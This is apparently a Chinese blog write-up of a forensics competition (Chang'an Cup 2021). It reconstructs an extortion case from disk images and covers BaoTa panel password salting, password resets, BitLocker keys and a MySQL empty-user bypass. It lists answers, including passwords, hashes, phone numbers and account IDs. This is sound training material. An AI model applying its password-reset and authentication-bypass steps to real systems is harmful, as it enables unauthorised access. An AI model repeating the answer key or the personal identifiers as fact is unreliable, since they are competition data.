好吧……还是正经一点,整一份宝塔的代码看一看吧……正好宝塔貌似是python写的,能看能看……

通过搜索我们知道宝塔的工具面板的代码是在/www/server/panel下面,所以我们直接看panel下面的代码(好吧,还是搜了:

image-20211030141832573

image-20211030141916974

def set_panel_pwd(password,ncli = False):
    import db
    sql = db.Sql()
    result = sql.table('users').where('id=?',(1,)).setField('password',public.password_salt(public.md5(password),uid=1))
    username = sql.table('users').where('id=?',(1,)).getField('username')
    if ncli:
        print("|-用户名: " + username)
        print("|-新密码: " + password)
    else:
        print(username)

我们发现这里调用了public类的md5方法,我们继续跟进,在/www/server/panel/class/public里面可以找到password_saltmd5两个方法:

def password_salt(password,username=None,uid=None):
    '''
        @name 为指定密码加盐
        @author hwliang<2020-07-08>
        @param password string(被md5加密一次的密码)
        @param username string(用户名) 可选
        @param uid int(uid) 可选
        @return string
    '''
    chdck_salt()
    if not uid:
        if not username:
            raise Exception('username或uid必需传一项')
        uid = M('users').where('username=?',(username,)).getField('id')
    salt = M('users').where('id=?',(uid,)).getField('salt')
    return md5(md5(password+'_bt.cn')+salt)

从函数可以看到,这个盐的值是从数据库里面查询出来的,我们直接查看数据库(/www/server/panel/data/default.sql,这个文件可以直接看到,也可以从class目录下的db.py看到):

image-20211030171819257

image-20211030143324905

  1. 请分析该服务器,网站源代码所在的绝对路径为

/www/wwwroot/www.honglian7001/

image-20211030132753814

也可以把宝塔服务重新启动起来:

这里因为检材中是静态地址,我们需要先改为DHCP来适应VMware(傻子才会修改VMware而不修改虚拟机:

centos dhcp网络设置

修改好后,我们直接重启宝塔:

bt
bt default

然后就发现,,密码不对……直接修改密码,随便改一个就很好了

image-20211030144858859

  1. 请分析,网站所使用的数据库位于IP为()的服务器上(请使用该IP解压检材5,并重构网站)【标准格式:111.111.111.111】

192.168.110.115

  1. 请分析,数据库的登陆密码为【区分大小写】

wxrM5GtNXk5k5EPX

我们在网站目录下找一下相关的代码文件,在/www/wwwroot/www.honglian7001/app/database.php中我们可以看到网站的数据库配置:

image-20211030145119582

  1. 请尝试重构该网站,并指出,该网站的后台管理界面的入口为【标准格式:/web】

从目录结构可以看到/www/wwwroot/www.honglian7001/app/admin……所以比较容易猜测admin,,,后面嫌疑人的PC端的检材也可以看出来: image-20211030152049564

  1. 已该涉案网站代码中对登录用户的密码做了加密处理。请找出加密算法中的salt值【区分大小写】

    lshi4AsSUrUOwWV

  2. 请分析该网站的管理员用户的密码为:

    security

管理员用户密码校验的代码肯定在/admin文件夹下,在/www/wwwroot/www.honglian7001/app/admin下的common.php里面看到校验的代码:

image-20211030173556802

  1. 在对后台账号的密码加密处理过程中,后台一共计算几次哈希值

    3

  2. 请统计,后台中,一共有多少条设备记录

    6002

  3. 请通过后台确认,本案中受害者的手机号码为

    18644099137

  4. 请分析,本案中受害者的通讯录一共有多少条记录

    34

这里有点打脸了……刚才想着它只用配置一个虚拟机,所以我选择修改虚拟机的网络设置而不是更改VMware的网络配置……但是,如果是一个网络集群的话,,,还是乖乖地改VMware的网络配置吧……

改完配置以后,开始重组raid,恢复数据库,这里用的是R-studio,比较好用,重组出来后导出img。分析、仿真一条龙。然后我们尝试一下刚才猜测的/admin,发现就是后台。

image-20211030172554430

我们下来找以下用户名和密码,这个时候我们应该是要查询日志,我首先去查看了/www/wwwlogs/www.honglian7001.log文件,但是没有找到,然后就在网站的目录里面寻找。最后找到了/www/wwwroot/www.honglian7001/runtime/log/202104/24.log文件,我们直接搜password就可以找到用户是admin,密码是security

image-20211030173009903

然后直接在后台里面翻找,就能看到上面问题的答案了。

检材四

通过对检材二和三进行分析,警方通过IP落地,警方掌成功抓获犯罪嫌疑人,现将嫌疑人的PC机和手机进行了取证,分别制作了镜像,请使用第13题的答案对检材四进行解密,并回答下列问

  1. 请计算检材四-PC的原始硬盘的SHA256

E9ABE6C8A51A633F809A3B9FE5CE80574AED133BC165B5E1B93109901BB94C2B

  1. 请分析,检材四-PC的Bitlocker加密分区的解密密钥为

511126-518936-161612-135234-698357-082929-144705-622578

取证大师直接自动取证就可以找到:

image-20211030140436916

  1. 请分析,检材四-PC的开机密码为

12306

仿真就出来了

image-20211030150957461

  1. 经分析发现,检材四-PC是嫌疑人用于管理服务器的设备,其主要通过哪个浏览器控制网站后

Google Chrome

这个直接翻浏览记录,,,发现有两个浏览器,但是edge只干了一件事情——下载Chrome [doge]

  1. 请计算PC检材中用户目录下的zip文件的sha256值

0DD2C00C8C6DBDEA123373F91A3234D2F07D958355F6CD7126E397E12E8ADBB3

  1. 请分析检材四-phone,该手机的IMEI号为

868668043754436 868668044204431

image-20211030135510278

  1. 请分析检材四-phone,嫌疑人和本案受害者是通过什么软件开始接触的(标准格式:支付宝

伊对

  1. 请分析检材四-phone,受害者下载恶意APK安装包的地址为

https://cowtransfer.com/s/a6b28b4818904c

  1. 请分析检材四-phone,受害者的微信内部ID号为

wxid_4drzfboq0hk322

  1. 请分析检材四-phone,嫌疑人用于敲诈本案受害者的QQ账号为

1649840939

这块没啥……就是对着取证分析软件一顿翻,开始挖坟(看戏)……

image-20211030152822221

image-20211030152833632

image-20211030152853849

image-20211030152938242

image-20211030152958826

  1. 请综合分析,嫌疑人用于管理敲诈对象的容器文件的SHA256值为

9C4BE29EB5661E6EDD88A364ECC6EF004C15D61B08BD7DD0A393340180F15608

  1. 请综合分析嫌疑人检材,另外一受害者“郭先生”的手机号码为

    15266668888

  2. 通过嫌疑人检材,其中记录了几位受害者的信息

    5

我们在嫌疑人的PC的用户目录下找到一个叫“赚钱工具”的压缩包……导出来,解压,密码一试就出来了,就是主机的密码。我们用虚拟硬盘vmdk文件直接取证(如果文件删除了的话,启动起来就看不到了,但是取证软件就可以看到,甚至导出)

  1. 请使用第11题的密码解压“金先生转账.zip”文件,并对压缩包中的文件计算SHA256值

在取证大师中可以找到,导出,算一下就好了:

image-20211030164924471

但,,,当我看了复盘以后我才发现……这个犯罪嫌疑人就TM是天才,每次干完坏事,直接打个快照然后把东西全删了,这nm是我玩玩没有想到的……绝了!

然后我又尝试着直接打开虚拟机,发现依据vmdk直接仿真的和直接打开虚拟机有很大差别,而差别就是快照!(这里请教了一下konge师傅,当你给虚拟机打一个快照的时候,他会生成一个*-0000001.vmdk文件,这个虚拟硬盘文件就是打快照时*.vmdk的一个分支。所以*.vmdk就是全部的文件,也就是没有打快照前的文件,而*-0000001.vmdk里面就是新储存的文件或者删除的文件信息。)

咳咳……

现在相当于是恢复了相关的证据文件,但是小白鼠.txt是个加密容器还没有解密,我们在取证大师的加密文件中看到了一个key.rar我们合理怀疑这个就是密钥文件(但是比赛的时候我一个劲想着把key.rar解开,以为里面的图片才是密钥文件…… )

然后就可以看到郭先生的信息了,文件名里面的电话就是郭先生的电话:

image-20211030171037976

  1. 请综合分析,受害者一共被嫌疑人敲诈了多少钱(转账截图被隐藏在多个地方)

6100

这个说实话,,,有点难搞:

image-20211030180910494

image-20211030180933711

image-20211030181008891

然后PC端里面的压缩包的图片:

image-20211030181336911

然后就错了……

还有一笔在数据库里,,,这个鬼能想到啊。

然后很自然的想到,分析,导出数据库,查看那个图片。但是,问题来了,虚拟机里面的数据库是个server,并不是文件。所以我们得直接通过服务进行连接。但是不管是什么工具或者是在它服务器上面都连不上数据库。这块是看了复盘才知道,数据库有个”空用户问题“,我们得需要先修一下这个。

然后这里请教了一下Frank。这里的空用户问题根源是用户的一个匹配问题,说直白些就是,你以为连接数据库时你用的是A用户,A用户是有密码的,你也传了一个密码进去;但是你却匹配到了B用户,而B用户却没有密码,就发生了冲突。而为什么会匹配错呢?原因是当你登录mysql的时候,server会解析你使用的用户和你的ip或者域名。然而它匹配的时候是按照user表里面的用户顺序挨个进行匹配。一旦匹配上了,就不会匹配后面的了。所以问题其实归根结底出现在mysql匹配用户是匹配顺序上:

image-20211030195116381

解决方法:

  1. 去掉密码验证,这样的话都没有密码了,也就没有冲突了。
  2. 删除掉可能会导致匹配错误的用户(但是你还是得先去掉密码登陆进去……)
  3. mysql源码,查看他的匹配优先排序的算法(https://dev.mysql.com/doc/refman/5.7/en/connection-access.html),对着英文看得不是很仔细,也没认真看……然后就被羊羊师傅骂了[快哭了]。这里有一条规则是user为(空)的用户可以匹配任意用户名,所以我们在尝试使用命令去连接时,会先被 Host 为 localhost.localdomain 的User (为空) 的字段匹配到,因此导致报错。

最后终于看到数据库了,,,泪目:

image-20211030195814328

写在后面

花了基本上整整一天的时间,终于把长安杯2021复现完了。有些感受(非常不成熟,但是还想说出来交流交流

  1. 在去年打取证比赛的时候,就注意到了一个”综合取证“或者说是”整体考虑“的问题。也许是因为我们毕竟不是专业的警察或者什么,我们更多的把这个当作是题目而不是真正的案情……这一点需要注意一下。
  2. 关于复盘的时候,复盘的老师说”宝塔这几年比较常见”其实想想也比较正常或者说是一个趋势吧……现代的诈骗不像原来那样比较简单,只能说慢慢地向技术方向走。但是搞诈骗的一般是没有什么技术的(毕竟有技术的也不屑干这个,但也有例外),所以他们就依托于傻瓜教程,或者说是集成度很高的工具。或许也是作案成本的问题吧……所以我在网上搜到的那个框架里面直接就是录好的教程,而且教程甚至十分傻瓜。想想其实挺可怕的……(一些乱七八糟的想法,,很肤浅,,看看就行了
  3. 还有就是,,,别没事干看黄……有那个功夫还不如找女朋友。。。
  4. From hs:终于能体会为什么诈骗好几万,原来不是一次性,而是分平台分别诈骗……

评论